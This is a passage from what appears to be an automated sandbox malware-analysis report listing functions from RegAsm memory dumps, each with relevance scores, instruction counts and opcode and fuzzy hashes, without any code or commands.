                                    • Instruction Fuzzy Hash: 33117C38A05210CFC764AF78E518A9A7BF8AF8925070545A9E869DB321DB31DC02CFA1
                                    Function 0614EC98 Relevance: .0, Instructions: 46COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 717b4118f3baf399f35545b83e9efc0a9e48d60637e19984756dee6f220a58e7
                                    • Instruction ID: 5c66e72bce46f889968907bb20ce3d1d0231d2723416f73a95d85ebb6982ffcd
                                    • Opcode Fuzzy Hash: 717b4118f3baf399f35545b83e9efc0a9e48d60637e19984756dee6f220a58e7
                                    • Instruction Fuzzy Hash: F6017875C042189FDB04EFB1D9593EEBFB0FB89301F1088A6D514A72E0DB781698CB80
                                    Function 0614B158 Relevance: .0, Instructions: 46COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b91312f01eb710ad5881ce095bf47cfff9a939490f5589d07f49e2c1c7f1619a
                                    • Instruction ID: 211ef97c0af72131b4eaa652612629ad2a5d6e27a67fd97389cac0e43b30ef45
                                    • Opcode Fuzzy Hash: b91312f01eb710ad5881ce095bf47cfff9a939490f5589d07f49e2c1c7f1619a
                                    • Instruction Fuzzy Hash: 2B01D632B001286FDB45AE69AC00BAF3BEBEBC8750B148029F915DB280CF71DD1197E0
                                    Function 0614B147 Relevance: .0, Instructions: 43COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a81f72494d36ae93d77d1a8b4a15c1133b100f67c80dfa04b0c1713cfff30cff
                                    • Instruction ID: 23b795cd7ab68792ef597108f4257506f2aaee17d7e34298ce4009afba131615
                                    • Opcode Fuzzy Hash: a81f72494d36ae93d77d1a8b4a15c1133b100f67c80dfa04b0c1713cfff30cff
                                    • Instruction Fuzzy Hash: BA018132E41115AFDF459FA4AC00B9B3BB6EB88790F158026F904D7140CB31D9129B90
                                    Function 0614BEB8 Relevance: .0, Instructions: 37COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 27746ec2e672c15083f027b642284050dbbc5380f46d5ed4224fdbcd0cce9ece
                                    • Instruction ID: 96b9f93bf3f50c695ca5ec3fe44afb9adf173ef9539efdb84fefc4ec5765b63b
                                    • Opcode Fuzzy Hash: 27746ec2e672c15083f027b642284050dbbc5380f46d5ed4224fdbcd0cce9ece
                                    • Instruction Fuzzy Hash: 2401A474E052199FCF44EFB989006AEBBB5AF48200F50856AD519E7250E73899118FA0
                                    Function 0614B8E9 Relevance: .0, Instructions: 18COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 271356e0e7415298052b4d087ed4f7e6d28006722af691a7347c3060d6946832
                                    • Instruction ID: fec6de155cbe8131fe5a57e3fbb3973c303258ae23ff698d0927408a90b34b90
                                    • Opcode Fuzzy Hash: 271356e0e7415298052b4d087ed4f7e6d28006722af691a7347c3060d6946832
                                    • Instruction Fuzzy Hash: 11D02E3080430A8BC388BB62FA87BA2330DEBC4300F408120F2054B128EB78EE06D290

                                    Non-executed Functions

                                    Function 00F66300 Relevance: 1.8, Strings: 1, Instructions: 596COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3220892692.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f60000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: .5uq
                                    • API String ID: 0-910421107
                                    • Opcode ID: cf036c841538c498f6b656a20f8dbc81ab92625dd1a547e2b5a19d753151378c
                                    • Instruction ID: 3ef4ebbfb9d07d09e8d2f6dccb519f703a44295c1ca63a503a265140d2f5e3bb
                                    • Opcode Fuzzy Hash: cf036c841538c498f6b656a20f8dbc81ab92625dd1a547e2b5a19d753151378c
                                    • Instruction Fuzzy Hash: 79529B74E01228CFDB64DF69C984B9DBBB2BF89300F1085E9D809AB255DB359E81DF50
                                    Function 0614CA70 Relevance: .2, Instructions: 222COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 280698f2d95f030d8051b63a8de4bdffb0f32c1574343694f368c2e68b92f390
                                    • Instruction ID: 732ccd02572d689bb4745d645ca436f27b90edde0484a336816e59acd0aaffed
                                    • Opcode Fuzzy Hash: 280698f2d95f030d8051b63a8de4bdffb0f32c1574343694f368c2e68b92f390
                                    • Instruction Fuzzy Hash: 95B1A674E01218CFDB54DFA9D984A9DBBB2FF89310F1081A9E819AB365DB30AD41CF40
                                    Function 00F66933 Relevance: .2, Instructions: 193COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3220892692.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f60000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f04ba512a3ec7e8fcddf76a1934e322af6bb33bb4ef61536e2530fe68acb99e5
                                    • Instruction ID: 76f3f3e0470a97c76f456b82646a2b79e2910167d5ec93a0f27f195ea4031d36
                                    • Opcode Fuzzy Hash: f04ba512a3ec7e8fcddf76a1934e322af6bb33bb4ef61536e2530fe68acb99e5
                                    • Instruction Fuzzy Hash: FDA1AD74A01228CFDB64DF64C994B9ABBB2BF4A300F1089E9D40DAB354DB359E81DF51
                                    Function 0614CA5F Relevance: .1, Instructions: 131COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a2cfd88448ff31f8c76b9c6e760b0e2ca49e98bed5ddb1e70b738bc1aa993bde
                                    • Instruction ID: 04b64e9c955be0365ade05d5dbc87e9d33207cf12f6ba35c59c091a44f2977cc
                                    • Opcode Fuzzy Hash: a2cfd88448ff31f8c76b9c6e760b0e2ca49e98bed5ddb1e70b738bc1aa993bde
                                    • Instruction Fuzzy Hash: B2519674E016088FDB48DFAAD484A9DBBF2BF89300F14C169E419EB365EB309942CF50
                                    Function 00F66B14 Relevance: .1, Instructions: 116COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3220892692.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f60000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a286f286ce7c3f8b48a02af2b5c281e3729d37f686c4913841a06fb93368e3db
                                    • Instruction ID: 530ee8a97129c823238cfb411a8fe589b0a961a5c08073f530eaf5e1c5d99862
                                    • Opcode Fuzzy Hash: a286f286ce7c3f8b48a02af2b5c281e3729d37f686c4913841a06fb93368e3db
                                    • Instruction Fuzzy Hash: D3519F74A01228CFCB64DF24C954BAAB7B2BF4A305F5089E9D40AAB354CB319E81DF50
                                    Function 06169F14 Relevance: .0, Instructions: 17COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223373192.0000000006160000.00000040.00000800.00020000.00000000.sdmp, Offset: 06160000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6160000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c031b557e691738393e00b4d962345d3aeb1de75897d9f4ea912a580a5390bab
                                    • Instruction ID: 15c2f219e3dc99c7166905c036dacbd59243b72e6515e975e88e10e448158344
                                    • Opcode Fuzzy Hash: c031b557e691738393e00b4d962345d3aeb1de75897d9f4ea912a580a5390bab
                                    • Instruction Fuzzy Hash: 05D09E74D5421CCBDB20EFA5D851ABCF771EF85300F0168EAA409B3111D7785A519F66
                                    Function 0614CD86 Relevance: .0, Instructions: 17COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a2cf1e520f030d1742f270b92ddb9cd2085429c7cc3a6b22f78e44b81ee69cf0
                                    • Instruction ID: ce164b0ba4aa9e4afd2e0c59b24c66d536c502bc5140b5cc330c847a56a08325
                                    • Opcode Fuzzy Hash: a2cf1e520f030d1742f270b92ddb9cd2085429c7cc3a6b22f78e44b81ee69cf0
                                    • Instruction Fuzzy Hash: 91D09E34D5425C8BCB60EFA8DC517ADB771FF85300F0025A5D409B7111D7745E509E96